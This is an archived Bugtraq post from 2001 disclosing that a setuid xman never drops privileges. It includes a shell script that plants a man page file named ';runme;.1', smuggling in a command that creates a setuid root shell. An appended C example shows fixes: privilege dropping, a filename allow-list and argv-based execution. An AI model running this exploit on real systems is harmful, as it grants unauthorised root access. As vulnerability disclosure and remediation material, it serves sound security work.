6761527 2001-07-17 20:28 +0000 /39 lines/ <v9@realhalo.org>
Sent by: joel@lysator.liu.se
Imported: 2001-07-18 00:09 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18055>
Subject: xman (suid) exploit, made easier.
------------------------------------------------------------
From: <v9@realhalo.org>
To: bugtraq@securityfocus.com
Message-ID: <20010717202808.26309.qmail@securityfocus.com>

xman doesn't drop privileges anywhere in the program, but does support suid installation. So, exploiting via a system call is much easier than the buffer overflow in MANPATH mentioned in another bugtraq posting. Here is an example of such an exploitation possibility:

-- xxman.sh --
#!/bin/sh
# example of xman exploitation. xman
# supports privileges. but, never
# drops them.
# Vade79 -> v9@realhalo.org -> realhalo.org.
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit. then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest
-- xxman.sh --

Vade79 -> v9@realhalo.org -> realhalo.org.
(6761527) / <v9@realhalo.org>/----------------------
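The two defensive fixes for the root cause described in the post, as an added C example (not xman's own code; the function names and the filename allow-list are assumptions): a setuid program drops its privileges before handling user-controlled data, and passes a man page filename as its own argv element instead of splicing it into a shell command string, so a name like ';runme;.1' stays data.

```c
/* Added example, not xman's code: (1) drop setuid privileges before touching
 * user-controlled data; (2) never build a shell command string from a filename
 * such as ';runme;.1'; hand it to the child as a separate argv element. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Permanently give up setuid/setgid privilege; 0 on success, -1 on failure. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0) return -1;
    if (geteuid() != getuid() || getegid() != getgid()) return -1;
    /* A non-root process must now be unable to get root back. */
    if (getuid() != 0 && setuid(0) == 0) return -1;
    return 0;
}

/* Allow-list (assumed policy) for a man page filename: letters, digits, '.',
 * '_', '-' only, and no leading '-' (would parse as an option). Rejects ';runme;.1'. */
int safe_manpage_name(const char *name)
{
    if (name == NULL || *name == '\0' || *name == '-') return 0;
    for (; *name; name++)
        if (!isalnum((unsigned char)*name) && strchr("._-", *name) == NULL)
            return 0;
    return 1;
}

/* Run argv[0] with an explicit argument vector; returns exit status or -1. */
int run_argv(char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execv(argv[0], argv); _exit(127); }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* The post's filename reaches the shell as $1 (data), not as command text. */
    char *argv[] = { "/bin/sh", "-c", "test \"$1\" = ';runme;.1'", "sh", ";runme;.1", NULL };
    if (drop_privileges() != 0) return 1;
    printf("name ok: %d, shell saw literal arg: %d\n", safe_manpage_name(";runme;.1"), run_argv(argv) == 0);
    return 0;
}
```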